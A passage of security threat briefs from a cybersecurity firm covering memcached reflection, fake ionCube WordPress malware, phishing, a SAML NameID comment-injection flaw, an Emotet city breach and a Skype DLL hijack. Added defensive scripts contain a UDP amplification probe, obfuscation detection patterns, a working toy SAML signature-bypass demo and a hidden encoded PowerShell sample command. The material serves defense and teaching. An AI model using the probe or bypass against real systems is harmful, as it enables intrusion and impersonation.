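    udp = re.search(r"-U\s*(\d+)", args)
    listen = re.search(r"-l\s*([^\s]+)", args)
    udp_port = int(udp.group(1)) if udp else 11211
    bound = listen.group(1) if listen else "0.0.0.0"
    return {
        "udp_enabled": udp_port != 0,
        "listen": bound,
        "reachable_from_network": not bound.startswith("127.") and bound != "::1",
    }


def probe(host, port=11211, timeout=2.0):
    """Send one stats probe to a host you own and report what comes back."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    request = stats_probe(request_id=1)
    sock.sendto(request, (host, port))
    responses = []
    try:
        while True:
            data, _ = sock.recvfrom(65535)
            responses.append(data)
    except socket.timeout:
        pass
    finally:
        sock.close()
    return (amplification_factor(request, responses) if responses else 0.0), responses


# Constructed reply to a stats probe from a tiny, idle instance. stats alone gives a
# modest factor; attackers who can also 'set' a large value and then 'get' it are the
# ones who reach the 51,200x figure.
SAMPLE_RESPONSE = udp_frame(1, 0, 1, b"STAT pid 4242\r\nSTAT uptime 12\r\nEND\r\n")

if __name__ == "__main__":
    print("probe bytes:", len(stats_probe()))
    print("amplification on sample reply:", amplification_factor(stats_probe(), [SAMPLE_RESPONSE]))
    print(audit_command_line("memcached -m 64 -p 11211 -u memcache -l 127.0.0.1 -U 0"))
```

    A server that answers the probe at all from the internet is the finding; the exact factor only tells you how attractive a reflector it is. The audit covers the two settings that matter, UDP off and a non-routable bind address, and a perimeter block on 11211 is the safety net for hosts the audit misses.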

    3. WordPress ionCube Malware

    Overview

    A new and subtle strain of malware has been discovered posing as legitimate ionCube-encoded files, hence the name ionCube Malware. Cybercriminals use it to create backdoors on vulnerable websites, through which they can steal data or plant more damaging malware.

    ionCube is a commercial PHP encoder that turns readable PHP source files, used to create dynamic content on websites, into an encoded form that cannot be read directly, typically to protect the intellectual property in licensed PHP software. Because legitimately encoded files are unreadable by design, a malicious file that mimics the format does not stand out.

    Recommendations

    The infections are being attributed to out-of-date content management system (CMS) plugins and platform software. Samples identified in the infections are named "diff98.php" and "wrgcduzk.php" and were found in the WordPress core directories. The attackers also name parts of the malicious code to look very similar to legitimate ionCube code: for example, where the real code uses "_il_exec", the malicious code uses "il_exec".

    We recommend keeping all CMS plugins and platform software up to date. Outdated plugins are one of the most common ways WordPress sites are compromised, which makes plugin management very important. It is also worth examining any ionCube-encoded files for inconsistencies, such as unexpected filenames, locations or identifiers, to make sure nothing has been tampered with.
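    An added triage script (written for this page, not the researchers' or WordPress's code) that applies the tells above to a tree of PHP files: the known dropped filenames, PHP files inside the core directories that are not part of core, the "il_exec" lookalike identifier, and the usual obfuscation calls. The sample file contents are constructed, and CORE_MANIFEST is a three-entry stand-in for the real list of core files.

```python
"""Triage PHP files on a WordPress install for the fake-ionCube pattern: known
dropped filenames, PHP files inside core directories that are not part of core,
the 'il_exec' lookalike identifier, and common obfuscation calls.

Added example; the file contents are constructed and CORE_MANIFEST is a short
stand-in for the real core file list."""
import os
import re

KNOWN_DROPPED = {"diff98.php", "wrgcduzk.php"}
CORE_DIRS = ("wp-admin", "wp-includes")
# Stand-in for the list of files that belong to the installed WordPress version.
CORE_MANIFEST = {
    "wp-includes/class-wp-hook.php",
    "wp-includes/plugin.php",
    "wp-admin/admin.php",
}
# Genuine ionCube-encoded files reference _il_exec; the fake drops the underscore.
LOOKALIKE = re.compile(r"(?<![A-Za-z0-9_])il_exec\b")
OBFUSCATION = re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I)


def triage_file(relpath, content, manifest=CORE_MANIFEST):
    """Return the reasons a file deserves a closer look (empty list: nothing noted)."""
    reasons = []
    name = os.path.basename(relpath)
    top = relpath.split("/", 1)[0]
    if name in KNOWN_DROPPED:
        reasons.append("known dropped filename")
    if top in CORE_DIRS and relpath.endswith(".php") and relpath not in manifest:
        reasons.append("php file not in core manifest")
    if LOOKALIKE.search(content):
        reasons.append("il_exec lookalike identifier")
    if OBFUSCATION.search(content):
        reasons.append("obfuscation call")
    return reasons


def triage_tree(files, manifest=CORE_MANIFEST):
    """files: {relative path: contents}. Returns only the files with findings."""
    findings = {}
    for path, content in files.items():
        reasons = triage_file(path, content, manifest)
        if reasons:
            findings[path] = reasons
    return findings


def load_tree(root):
    """Read every .php file under a real install into the shape triage_tree expects."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            if n.endswith(".php"):
                full = os.path.join(dirpath, n)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    files[os.path.relpath(full, root).replace(os.sep, "/")] = fh.read()
    return files


# Constructed sample install: one clean core file, one legitimately encoded plugin file,
# and two planted files imitating ionCube output.
SAMPLE_FILES = {
    "wp-includes/class-wp-hook.php": "<?php\nfinal class WP_Hook implements Iterator, ArrayAccess {}\n",
    "wp-content/plugins/licensed-widget/widget.php":
        "<?php //0046f\nif(!extension_loaded('ionCube Loader')){die('ionCube Loader required');}"
        "\n_il_exec();\n",
    "wp-includes/diff98.php":
        "<?php //0046f\nif(!extension_loaded('ionCube Loader')){die('ionCube Loader required');}"
        "\nil_exec(base64_decode('ZWNobyAxOw=='));\n",
    "wp-admin/wrgcduzk.php": "<?php\neval(gzinflate(base64_decode('ZWNobyAxOw==')));\n",
}

if __name__ == "__main__":
    for path, reasons in triage_tree(SAMPLE_FILES).items():
        print(f"{path}: {', '.join(reasons)}")
```

    The legitimately encoded plugin file produces no finding, which is the point of matching "il_exec" only when it is not preceded by an underscore. On a real install, pass load_tree(root) to triage_tree and replace CORE_MANIFEST with the real core file list, or cross-check the "not in core manifest" findings with WP-CLI's core verify-checksums command.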


  • Netizen Threat Brief: 28 February 2018 Edition

    Threats

    Listed below is information regarding two of this week's most critical threats and preventative measures to lessen the chances of a breach. This brief also contains an update to a previously covered vulnerability:

    1. Spike in W-2 Phishing Campaigns
    2. Single Sign-On Vulnerability
    3. Intel Spectre Firmware Fixes

    1. Spike in W-2 Phishing Campaigns

    Overview

    The FBI has warned of a sharp rise in phishing campaigns targeting businesses' W-2 information through payroll personnel. Because it is tax season, these emails are after highly sensitive personal information, including employees' Social Security numbers, and they go after payroll and Human Resources staff because those individuals have access to that data.

    The phishing attacks range from impersonation of an executive to a legitimate-looking email requesting employee information. In some cases, after obtaining the W-2 information, the criminals immediately followed up with a request for a wire transfer; many organizations were unaware for weeks or even months that they had been scammed.

    Recommendations

    Human error is one of the biggest entry points for cyber criminals.

    To mitigate a breach, we recommend:

    • Scrutinize your emails before clicking anything. Did you order or ask for anything for which you’re expecting a confirmation? Did the email come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
    • Verify that the sender is actually from the company sending the message
    • Did you receive a message or email from someone you don't recognize? Are they asking you to sign into a website to provide Personally Identifiable Information (PII) such as credit card numbers or Social Security numbers? A legitimate company will never ask for PII via instant message or email; this is a huge red flag.
    • Do not give out personal or company information.
    • Review both signature and salutation.
    • Do not click on attachments
    • Do not click on unrecognized links. If you do proceed, verify that the URL is the correct one for the company/service and it has the proper security in place (HTTPS)
    • Be wary of poor spelling, grammar, and formatting.
    • Many phishing emails convey a sense of urgency or even aggression as a form of intimidation. Any email demanding immediate action or addressing you in a threatening manner should be treated with suspicion. Also beware of messages that tempt you into opening an attachment or visiting a link. For example, an attachment titled "Staff Pay Raises 2018" may seem like something you really want to know about, but it could just be a ploy to plant malware on your system or steal your credentials.
    • Verify the sender—even if that means calling the person to confirm it was them who is requesting or sending the email.

    We also suggest that businesses maintain a hard copy of vendor contact information with a list of those that are authorized to approve changes in payment instructions. Also, businesses should delay a transaction until further additional verifications can be performed. For example, make staff wait to be contacted by the bank to verify the wire transfer.

    2. Single Sign-On Vulnerability

    Overview

    Single sign-on (SSO) is a session and user authentication service that organizations often leverage to use one set of login credentials in order to access multiple applications. SSO is extremely convenient as it will authenticate the end user for every application that the user has authorization and rights to, while also eliminating further prompts when switching between applications. SSO is also helpful for logging and monitoring users’ accounts and activity on the backend.

    A new vulnerability class has been discovered in implementations of the Security Assertion Markup Language (SAML), the open standard that lets an identity provider share authentication results with the applications (service providers) a user logs into. Affected service-provider software can be tricked into granting access as a different user. Using an existing user ID and password of their own, obtained legitimately or through other means such as social engineering, an attacker can alter the identity provider's signed response so that the service provider authenticates them as another user, without that user's password and without invalidating the signature. Predictability plays a part: most organizations assign user IDs according to a pattern, making a target's ID easy to find or guess, and with one set of credentials and a vulnerable service provider, higher access can be attained.

    Recommendations

    Implementations reported as affected include those of OneLogin, Clever, OmniAuth, Shibboleth and Duo Network Gateway. We recommend that any SAML-based SSO deployment apply the vendor patches and updates as soon as feasible. It is also worth enforcing multifactor authentication (MFA) at the application itself, not only at the identity provider: even when one account is compromised, the additional factor still stands between the attacker and another user's account.
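    An added demonstration of the bug class behind these advisories, written for this page and not taken from any of the affected projects. The published issue was that an XML comment placed inside the NameID element splits its text into two nodes: the canonicalization used by XML signatures drops comments, so the identity provider's signature still verifies, while a service provider that reads only the first text node sees a truncated user ID. The assertion fragment, account names and key below are constructed, and an HMAC over the canonical form stands in for XML-DSig.

```python
"""The NameID comment-injection bug in a few lines.

Added example with constructed data; an HMAC over the canonical XML stands in
for the XML-DSig signature, and the key is shared between the 'identity
provider' and 'service provider' only to keep the example short."""
import hashlib
import hmac
from xml.dom import minidom
from xml.etree.ElementTree import canonicalize

IDP_KEY = b"constructed-idp-signing-key"


def sign(xml_text):
    """Signatures cover the canonical form; exclusive C14N omits comments by default,
    so inserting a comment does not change what is signed."""
    return hmac.new(IDP_KEY, canonicalize(xml_data=xml_text).encode(), hashlib.sha256).hexdigest()


def verify(xml_text, signature):
    return hmac.compare_digest(sign(xml_text), signature)


def nameid_vulnerable(xml_text):
    """The affected pattern: take the first text node of NameID and stop there."""
    node = minidom.parseString(xml_text).getElementsByTagName("NameID")[0]
    return node.firstChild.data


def nameid_fixed(xml_text):
    """Concatenate every text/CDATA child; comments are neither, so they cannot split the value."""
    node = minidom.parseString(xml_text).getElementsByTagName("NameID")[0]
    return "".join(c.data for c in node.childNodes
                   if c.nodeType in (c.TEXT_NODE, c.CDATA_SECTION_NODE))


# The attacker's own account at the identity provider is named so that truncating it
# yields the victim's ID (constructed).
ISSUED = ("<Assertion><Subject><NameID>victim@example.com.attacker.example</NameID>"
          "</Subject></Assertion>")
TAMPERED = ISSUED.replace("victim@example.com.attacker.example",
                          "victim@example.com<!---->.attacker.example")


def demo():
    signature = sign(ISSUED)            # identity provider signs the genuine assertion
    return {
        "signature_still_valid": verify(TAMPERED, signature),
        "vulnerable_sp_sees": nameid_vulnerable(TAMPERED),
        "fixed_sp_sees": nameid_fixed(TAMPERED),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

    The signature check passes on the tampered assertion because the comment is invisible to canonicalization; the only thing that changes is how the service provider reads the value afterwards. A service provider also helps itself by rejecting any NameID that contains comment or child nodes at all, and by not letting users self-register IDs that are prefixes of other users' IDs.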

    3. Intel Spectre Firmware Fixes (Update)

    Overview

    In a previous Threat Brief entitled "Major Microchip Flaws", we covered two major flaws that security researchers revealed in the processors used in everyday devices. The flaws, known as Meltdown and Spectre, could allow an attacker to read sensitive data held in memory, such as passwords or data belonging to other running processes. Research also suggests that a complete fix would require replacing the chips themselves, but major vendors have released patches to mitigate the most serious variants of this threat.

    While data within a device should be protected and isolated, the flaws allow it to be exposed while the processor speculatively executes instructions ahead of time. Affected devices include, but are not limited to, desktops, laptops, smartphones and cloud servers.

    Update

    In response to the vulnerabilities, Intel has issued updated microcode that helps protect against the Spectre exploit (variant 2, branch target injection) on its newer processors, including 6th, 7th and 8th generation Intel Core processors and Intel Xeon Scalable processors.

    Intel has stated that the new microcode will in most cases be delivered through OEM firmware (BIOS/UEFI) updates. We also recommend continuing with routine patching, updates and upgrades of systems. The public disclosure in early January 2018 of Meltdown and Spectre, found by Google Project Zero among others, now has Intel looking to bolster its efforts to get ahead of newly discovered threat vectors.


  • Allentown, PA: Netizen Corporation, an award-winning provider of cyber security and related solutions for government and commercial markets, has formally promoted Gregory R. “Greg” Allen to Senior Vice President (SVP) of Strategic Accounts. Greg joined Netizen a year ago and has a career as a successful sales and operations executive with government contractors spanning the past 35 years.

    At Netizen, Greg develops strategic relationships with key government customers and partner companies to bring them trusted expertise and innovative solutions. He covers geographic locations including Maryland; Virginia; Washington, DC; Charleston, SC; and portions of the Midwest and West Coast of the United States. As Senior Vice President, Greg officially joins the core senior executive team of Netizen in managing components of company-wide business development. He is responsible for escalating growth into federal health IT, select civilian and defense government agencies, and state governments.

    “Greg has quickly become a key resource for facilitating growth into new strategic markets. This promotion recognizes his hard work, success, and the tremendous value that his experience and sphere of influence bring to the company,” said Max Harris, Netizen’s Chief of Business Development. He added that Greg will be focused in the DC Metropolitan area and other locations as assigned. He will be working to attain further strategic company growth by meeting with government agencies and establishing winning teams with partner companies that deliver the innovation, responsiveness, and value that Netizen is renowned for.

    Netizen has been awarded over $12,000,000 in contracts to provide cyber security and related solutions to the federal government in the past two years. They also provide these solutions to state government, municipal, and commercial customers to aid in maintaining the security and compliance of mission-critical IT infrastructure.

    About Netizen Corporation: Named the Lehigh Valley’s “Emerging Business of the Year” in 2015 and a recipient of Department of Defense (DoD) awards for superior customer service, Netizen is an Allentown, Pennsylvania based Service Disabled Veteran-Owned Business (SDVOSB) specializing in cyber security, compliance, and software assurance for defense, federal, and commercial markets. Their CyberSecure Solutions™ products and services are trusted to monitor and protect critical infrastructure in a cost-effective manner. Learn more at https://Netizen.net.

    #####

  • Netizen Case Study: 2018 Allentown City Government Breach

    Overview:

    Allentown’s city government has been breached by Emotet, a well-known piece of malware, or possibly a new variant of it with added functionality that makes it more dangerous and harder to detect and remove. Emotet has been a known threat globally since at least 2014, and its operators have kept evolving it to evade detection and mitigation. It is typically delivered through Microsoft Word email attachments laden with malicious macros that download and install the malware on the local computer; from there it enumerates connected network devices and shared folders to spread to.

    Emotet originally functioned as a banking trojan that steals financial information from infected machines. It has since grown into a modular platform: current variants harvest email address books, steal stored passwords, and brute-force credentials for network shares in order to spread laterally, and denial of service (DoS) capability has also been reported. In Allentown it apparently infected critical systems across nearly all of city government and is forcing the city to shut down a large portion of its information operations.

    Impact:

    The malware was first discovered in Allentown on or about Thursday, February 15, 2018. By then it was already self-replicating and harvesting city employees’ credentials for Microsoft applications and platforms. Officials have stated, however, that there is not yet evidence that any personal information of city residents has been compromised.

    Because of the remediation effort, Allentown’s finance department cannot complete any external banking transactions, local video surveillance networks are down, city law enforcement cannot access databases controlled by the Pennsylvania State Police, and many other day-to-day functions are severely affected. Essentially, any city function that relies on information technology assets is either shut down or crippled by the work of removing the malware and repairing the damage. The incident has already proven very costly, and it is still in the early stages of containment.

    The fix, including removal of the malware from all systems, is expected to cost at least an estimated $1 million, and probably more, as these efforts are typically underestimated at the time of the breach. An initial contract of $185,000 was awarded to a Microsoft emergency response team to assess and stop the spread of the malware. A further $800,000 to $900,000 will then have to be spent on recovering data and repairing the damage the malware has done. This does not include additional costs should employee or citizen data turn out to have been stolen.

    The aforementioned impact and overview information has been compiled from public statements and reports made by city officials regarding the incident. Though Netizen has not performed any work for the city of Allentown related to this breach at this time, the motives, methods, and tools leveraged for this particular attack are highly similar to prior attacks on other entities.

    What Can Be Learned From This?

    In cases similar to the attack on Allentown city government systems, there are several preventative tools, processes, and resources available to organizations that will help either prevent such attacks in the future altogether or at least mitigate the effects and contain the remediation costs of a breach.

    End-user awareness and training is probably the most important way to stop an attack before it starts. Attackers most often get into networks through human error, such as opening a suspicious email attachment. Simple annual (or, better yet, quarterly) training on basic “cyber hygiene”, such as using strong passwords, not sharing credentials, recognising a phishing email, reporting a suspected breach, and securing unattended devices and computers, goes a long way toward preventing or limiting the majority of breaches. In the case of Emotet, the lure is an attachment that asks the reader to enable macros; refuse. Macros should be disabled by default and, where possible, blocked by policy for documents that arrived from the Internet. Examine the email: is it from a sender you know? If so, call that person to verify that they actually sent the attachment, since Emotet sends its lures from mailboxes it has already compromised.
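    Policy alone does not stop a user from clicking “Enable Content”, so a mail gateway should also refuse documents that carry macros at all. The following is an added example, not Netizen’s tooling or any vendor’s product: an Office Open XML attachment (.docx/.xlsx/.pptx and their macro-enabled siblings) is a zip archive, and a document with VBA code stores it in a vbaProject.bin part and declares that part in [Content_Types].xml. The check below flags either indicator regardless of the extension the file arrives with. The sample documents are constructed in memory and are not real Word files.

```python
"""
Added example (not Netizen's tooling): a mail-gateway style check that flags
Office Open XML attachments carrying VBA macros, whatever extension they use.
The sample documents are constructed in memory below.
"""
import io
import zipfile
from typing import Dict

VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
MACRO_EXTENSIONS = {".docm", ".dotm", ".xlsm", ".xltm", ".pptm", ".potm"}


def inspect_ooxml(data: bytes) -> Dict[str, object]:
    """Look inside one attachment body for the two macro indicators."""
    result = {"is_ooxml": False, "has_vba_part": False, "declares_vba": False}
    if not data.startswith(b"PK"):
        return result  # not a zip, so not OOXML (legacy .doc OLE is handled elsewhere)
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
            result["is_ooxml"] = "[Content_Types].xml" in names
            result["has_vba_part"] = any(n.lower().endswith("vbaproject.bin") for n in names)
            if result["is_ooxml"]:
                ct = zf.read("[Content_Types].xml").decode("utf-8", "replace")
                result["declares_vba"] = VBA_CONTENT_TYPE in ct
    except zipfile.BadZipFile:
        pass  # corrupt zip: treated as non-OOXML here, a stricter gateway would quarantine
    return result


def verdict(filename: str, data: bytes) -> str:
    """BLOCK anything with macros; a macro part hiding behind a macro-free
    extension is doubly suspicious and is called out separately."""
    f = inspect_ooxml(data)
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if f["has_vba_part"] or f["declares_vba"]:
        if ext not in MACRO_EXTENSIONS:
            return "BLOCK: macros present but extension %s hides it" % (ext or "(none)")
        return "BLOCK: macro-enabled document"
    if ext in MACRO_EXTENSIONS:
        return "QUARANTINE: macro-enabled extension without macro part (inspect)"
    return "ALLOW"


def build_sample(with_macros: bool) -> bytes:
    """Construct a minimal OOXML-shaped zip for the demo (not a real Word file)."""
    ct = [
        '<?xml version="1.0" encoding="UTF-8"?>',
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">',
        '<Default Extension="xml" ContentType="application/xml"/>',
    ]
    if with_macros:
        ct.append('<Override PartName="/word/vbaProject.bin" ContentType="%s"/>' % VBA_CONTENT_TYPE)
    ct.append("</Types>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "\n".join(ct))
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macros:
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 stub")  # OLE header stub
    return buf.getvalue()


if __name__ == "__main__":
    for name, doc in [("invoice.docx", build_sample(False)),
                      ("invoice.docx", build_sample(True)),
                      ("invoice.docm", build_sample(True))]:
        print(name, "->", verdict(name, doc))
```

    Run as is, the three constructed attachments come back ALLOW, BLOCK (macros hidden behind .docx) and BLOCK (macro-enabled document). A real gateway would add the legacy OLE (.doc/.xls) case, which needs an OLE parser rather than a zip reader.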

    It is also worth enabling Multifactor Authentication (MFA) as an additional layer of security for network resources. The second factor can be a push approval or one-time code from an app such as Microsoft Authenticator, or a hardware token such as a YubiKey; a code sent by text message is better than nothing but is the weakest option, since phone numbers can be hijacked. MFA is highly cost effective and is already a feature of many modern applications that only needs to be switched on. Even if attackers have stolen passwords, they still need that second factor to reach the accounts, network shares and data behind them. Another effective defense is to never reuse passwords: a password used at home, or any variation of it, should never be used at work, and vice versa. Any overlap means that once one account is compromised, the same credential can be tried against every other account you hold, at work or on your personal systems.

    A more technical strategy is proper network segmentation: breaking the network into components that are firewalled off from one another so malware cannot move laterally and steal everything. For instance, a computer in the public works department should not be able to reach servers and workstations in the finance department. Limit the access between machines and departments, and apply the same thinking to user permissions and privileges. This is the principle of “least privilege”, commonly employed to contain attacks when they occur. Furthermore, if a computer does not need Internet access, or only needs it at certain times, enforce that on the external firewall. Most business-class firewalls can also deny traffic to and from foreign address ranges (geo-blocking) and should be configured to do so where the business has no need for that traffic.

    It is also essential to have security event monitoring. An open-source tool that we leverage extensively is Graylog. This log management and event monitoring software is scalable, flexible and customizable, not to mention free. Fed with the right inputs (Windows event logs, firewall and DNS logs, authentication logs), Graylog lets you see who is doing what, where connections are coming from and going to, and any abnormal events that pose a threat. Coupled with vulnerability monitoring, which scans systems and networks for misconfiguration, missing patches and gaps in their security posture, this becomes a powerful set of tools for limiting the spread of malware across a sensitive network and often for preventing the intrusion in the first place. Combined with threat intelligence feeds, it becomes far easier to spot a machine quietly communicating with a known attacker anywhere in the world. One such vulnerability monitoring tool is the Netizen CyberSecure scanner and dashboard, which scans systems for over 180,000 types of vulnerabilities and reports them in an easy-to-interpret analytics dashboard that integrates easily into existing IT infrastructure.
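    Monitoring only pays off if the rules match the behaviour of the malware in question. As an added example, and not Graylog’s or Netizen’s own code, the two detections below run over Windows Security events of the kind a forwarding agent would ship to a SIEM. The first catches an Office application spawning a script host (Event ID 4688, which requires process creation auditing with command-line logging enabled on the endpoints); the second catches one source address failing network logons against many accounts in a short window (Event ID 4625, logon type 3), which is what Emotet’s share brute-forcing looks like from the file server’s side. The event lines are constructed for the demonstration; host names and addresses are made up.

```python
"""
Added example, not Graylog's or Netizen's code: two SIEM-style detections
over Windows Security events. The events below are constructed for the demo.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed sample events, one JSON object per line (field names as in the
# Windows event XML). '-enc SQBFAFgA' is base64 UTF-16LE for "IEX".
SAMPLE_EVENTS = "\n".join(
    [
        '{"ts":"2018-02-15T09:02:09","EventID":4688,"Computer":"WS-FIN-07",'
        '"ParentProcessName":"C:\\\\Windows\\\\explorer.exe",'
        '"NewProcessName":"C:\\\\Program Files\\\\Microsoft Office\\\\Office16\\\\WINWORD.EXE",'
        '"CommandLine":"WINWORD.EXE invoice.doc"}',
        '{"ts":"2018-02-15T09:02:10","EventID":4688,"Computer":"WS-FIN-07",'
        '"ParentProcessName":"C:\\\\Program Files\\\\Microsoft Office\\\\Office16\\\\WINWORD.EXE",'
        '"NewProcessName":"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe",'
        '"CommandLine":"powershell -nop -w hidden -enc SQBFAFgA"}',
    ]
    + [
        '{"ts":"2018-02-15T09:05:%02d","EventID":4625,"Computer":"FS-01",'
        '"IpAddress":"10.20.5.44","TargetUserName":"user%02d","LogonType":3}' % (i, i)
        for i in range(40)
    ]
    + [
        '{"ts":"2018-02-15T09:30:00","EventID":4625,"Computer":"FS-01",'
        '"IpAddress":"10.20.9.8","TargetUserName":"jsmith","LogonType":3}'
    ]
)


def parse_events(text: str) -> List[Dict]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def basename(path: str) -> str:
    """Last component of a Windows path, lower-cased for comparison."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawned_script_host(events: List[Dict]) -> List[Dict]:
    """Rule 1: an Office application launched a shell or script interpreter."""
    hits = []
    for e in events:
        if e.get("EventID") != 4688:
            continue
        parent = basename(e.get("ParentProcessName", ""))
        child = basename(e.get("NewProcessName", ""))
        if parent in OFFICE and child in SCRIPT_HOSTS:
            hits.append({"host": e["Computer"], "parent": parent, "child": child,
                         "cmd": e.get("CommandLine", "")})
    return hits


def failed_logon_spray(events: List[Dict], window: timedelta = timedelta(minutes=5),
                       min_accounts: int = 20) -> List[Dict]:
    """Rule 2: one source fails network logons against many distinct accounts
    inside the window (share/credential brute force during lateral movement)."""
    by_src = defaultdict(list)
    for e in events:
        if e.get("EventID") == 4625 and e.get("LogonType") == 3:
            by_src[e["IpAddress"]].append((datetime.fromisoformat(e["ts"]), e["TargetUserName"]))
    hits = []
    for src, attempts in by_src.items():
        attempts.sort()
        for i, (t0, _) in enumerate(attempts):          # sliding window from each attempt
            accounts = {u for t, u in attempts[i:] if t - t0 <= window}
            if len(accounts) >= min_accounts:
                hits.append({"source": src, "distinct_accounts": len(accounts),
                             "from": t0.isoformat()})
                break
    return hits


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    print("office -> script host:", office_spawned_script_host(evs))
    print("logon spray:", failed_logon_spray(evs))
```

    With the sample data, rule 1 fires once (WINWORD.EXE launching an encoded, hidden PowerShell on WS-FIN-07) and rule 2 fires once for 10.20.5.44, which tried 40 accounts in under a minute; the single failure from 10.20.9.8 stays below the threshold, as a forgotten password should.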

    A centralized antivirus and endpoint management solution provides organizations with a comprehensive view of their antivirus defenses, real-time system-wide status, and granular command and control over network resources. The basic feature set of such suites is the ability to see every endpoint on the network, know what application versions each is running, push virus signature and policy updates promptly, and receive alerts and reports. Many also control which devices may connect to the network, and from where. A good example is the central management console that ships with Symantec Endpoint Protection.

    Lastly, properly documented policies and procedures for data security and backup/recovery operations will not necessarily prevent a breach, but they can dramatically lessen the impact and cost afterwards. Proper disaster recovery plans and preparations, including geographically separate backup sites for data and quarterly restore tests, reduce the downtime associated with a breach and avoid having to spend millions reconstructing damaged or deleted data. A comprehensive security plan addressing roles and responsibilities, organizational policies, and other aspects of information security will also formalize and standardize the response, eliminating or at least greatly reducing the confusion such an event causes.

    To summarize, a basic approach consisting of essential proactive cybersecurity measures can be very cost effective to implement, especially in comparison to breach cleanup costs that typically run into the millions of dollars and are almost always underestimated due to numerous hidden costs and damages not known at the time of the breach. The goal of any organization should be to put in place tools, processes, and controls tailored to their acceptable levels of risk and balanced with their budget to ensure they are not a “soft target.” This can prevent the majority of attacks out there and, at the very least, contain the damage inflicted by a breach to acceptable and tolerable levels which are far easier to recover from both financially and otherwise.

    For more information,
    visit our website at https://www.Netizen.net or call 1-844-NETIZEN

  • Threats

    Listed below is information regarding three of this week’s most critical threats, and preventative measures to lessen the chances of a breach:

    1. Severe Skype Vulnerability
    2. Domain Hijacking
    3. Windows 10 Null Character Flaw

    1. Severe Skype Vulnerability

    Overview

    A serious vulnerability has been discovered in Skype, one of the most popular free messaging and voice calling services. It could allow an attacker who already has a foothold as a local, unprivileged user to gain system-level privileges and thereby full control of the host machine.

    The vulnerability was reported to Microsoft and resides in Skype’s update installer, which runs with elevated privileges and is susceptible to Dynamic Link Library (DLL) hijacking. The installer loads a DLL by name, and the directories it searches include a temporary folder that a standard user can write to without any special privileges. An attacker drops a malicious DLL into that folder, named to match the legitimate one; when the update installer looks for the DLL, it finds the malicious copy first and executes the attacker’s code with the installer’s privileges.
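    The underlying check generalises beyond Skype: for any privileged program that loads a DLL by bare name, list the directories the loader consults before the directory holding the legitimate copy and ask which of them a standard user can write to. Each one is a hijack point. The following is an added example, not Microsoft’s or Skype’s code, and the search order, directory names and DLL name are a constructed scenario modelled on the description above; on a real host you would pass the actual search order and let `writable` fall back to `os.access`. It uses Python’s `ntpath` so the Windows path semantics hold wherever it runs.

```python
"""
Added example (not Microsoft's or Skype's code): find DLL hijack points in a
loader search order. Scenario below is constructed; names are placeholders.
"""
import ntpath
import os
from typing import Callable, List, Optional


def hijack_points(search_order: List[str], legit_dir: Optional[str],
                  writable: Callable[[str], bool] = lambda d: os.access(d, os.W_OK)) -> List[str]:
    """Directories searched before legit_dir that the caller can write to.
    With legit_dir=None (the DLL is absent everywhere) every writable
    directory in the order is a hijack point."""
    norm = lambda p: ntpath.normcase(ntpath.normpath(p))
    points = []
    for d in search_order:
        if legit_dir is not None and norm(d) == norm(legit_dir):
            break                      # real DLL is found here; later entries never consulted
        if writable(d):
            points.append(d)
    return points


def resolved_path(search_order: List[str], dll_name: str,
                  exists: Callable[[str], bool]) -> Optional[str]:
    """The path the loader would actually load for dll_name: first hit wins."""
    for d in search_order:
        candidate = ntpath.join(d, dll_name)
        if exists(candidate):
            return candidate
    return None


# Constructed scenario: an elevated installer running out of a per-user temp
# directory that loads a DLL by bare name. Directory list is illustrative.
TEMP = r"C:\Users\alice\AppData\Local\Temp"
SEARCH_ORDER = [
    ntpath.join(TEMP, "SkypeSetup"),   # directory of the executable
    r"C:\Windows\System32",
    r"C:\Windows\System",
    r"C:\Windows",
    TEMP,                              # current working directory
    r"C:\Tools",                       # a PATH entry (assumed)
]
LEGIT_DIR = r"C:\Windows\System32"
DLL = "helper.dll"                     # placeholder name, not the DLL from the report


def demo_writable(d: str) -> bool:
    """Stand-in for os.access on a real host: only the user's temp tree is writable."""
    return ntpath.normcase(d).startswith(ntpath.normcase(TEMP))


def demo_exists(p: str) -> bool:
    """Stand-in for os.path.exists: the attacker has planted a copy beside the installer."""
    planted = {ntpath.normcase(ntpath.join(TEMP, "SkypeSetup", DLL)),
               ntpath.normcase(ntpath.join(LEGIT_DIR, DLL))}
    return ntpath.normcase(p) in planted


if __name__ == "__main__":
    print("hijack points:", hijack_points(SEARCH_ORDER, LEGIT_DIR, demo_writable))
    print("loader picks:", resolved_path(SEARCH_ORDER, DLL, demo_exists))
```

    In the constructed scenario the only hijack point is the installer’s own temp subdirectory, because it is searched before System32; the two writable directories later in the order do not matter while a legitimate copy exists in System32, but become hijack points if the DLL is missing there, which is exactly the case the loader-by-name pattern makes dangerous.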

    Recommendations

    The Skype vulnerability will not be patched anytime soon: not because the flaw is unpatchable, but because fixing it requires a significant software rewrite, which means Microsoft will need to ship an all-new version of Skype rather than a patch to the existing one.

    Because this is a local privilege escalation, the attacker first needs code running as a standard user on the machine, so the defenses focus on keeping that initial foothold out. To mitigate a breach, we recommend:

    • Do not click on suspicious links from unknown senders
